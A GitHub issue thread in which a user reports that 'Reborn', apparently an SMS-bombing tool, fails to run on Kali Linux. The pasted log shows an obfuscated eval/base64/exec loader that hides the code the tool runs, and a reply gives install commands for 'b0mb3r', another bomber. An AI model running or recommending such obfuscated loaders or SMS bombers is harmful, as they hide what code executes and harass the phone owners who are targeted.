### ISSUE TITLE
On Kali Linux

### ISSUE THREAD

**Issue by xXMASTER276Xx** [4nat/Reborn#6]
```

--------------------------------------------------
|              YOUTUBE.COM/HARUNMISTIK           |
|              INSTAGRAM.COM/ICHBINHARUN         |
-------------------------------------------------
 1. Termux
 2. Debian / Linux Or Other OS.
 3. Ios

Choice >> 
2
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
dos2unix ya está en su versión más reciente (7.4.0-2).
python3 ya está en su versión más reciente (3.8.2-2).
python3-pip ya está en su versión más reciente (20.0.2-4).
Los paquetes indicados a continuación se instalaron de forma automática y ya no son necesarios.
  libpython3.7 libpython3.7-dev python3.7-dev
Utilice «apt autoremove» para eliminarlos.
0 actualizados, 0 nuevos se instalarán, 0 para eliminar y 0 no actualizados.
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (2.23.0)
Requirement already satisfied: colorama in /usr/lib/python3/dist-packages (0.4.3)
dos2unix: convirtiendo archivo /usr/bin/Reborn a formato Unix...
/usr/bin/Reborn: línea 2: magic: orden no encontrada
/usr/bin/Reborn: línea 3: love: orden no encontrada
/usr/bin/Reborn: línea 4: god: orden no encontrada
/usr/bin/Reborn: línea 5: destiny: orden no encontrada
/usr/bin/Reborn: línea 6: joy: orden no encontrada
/usr/bin/Reborn: línea 7: error sintáctico cerca del elemento inesperado `('
/usr/bin/Reborn: línea 7: `trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')'
Requirements Installed....
Press Enter To Continue...
Traceback (most recent call last):
  File "sms.py", line 8, in <module>
    eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
  File "<string>", line 6, in <module>
ModuleNotFoundError: No module named 'mysql'
start.sh: línea 65: pip: orden no encontrada
start.sh: línea 66: pip: orden no encontrada
start.sh: línea 67: pip: orden no encontrada
start.sh: línea 68: pip: orden no encontrada
start.sh: línea 69: pip: orden no encontrada
Requirements Installed....
Press Enter To Continue...

```

**Comment by nm17** [comment]
This bot is no longer supported by the developer. Use https://github.com/crinny/b0mb3r .

```
$ pip3 install b0mb3r
$ b0mb3r
```

**Comment by nm17** [comment]
@xXMASTER276Xx

**Comment by 4nat** [comment]
pip install pymysql
        pip install mysql-connector-python

**Comment by 4nat** [comment]
pip install pymysql
        pip install mysql-connector-python
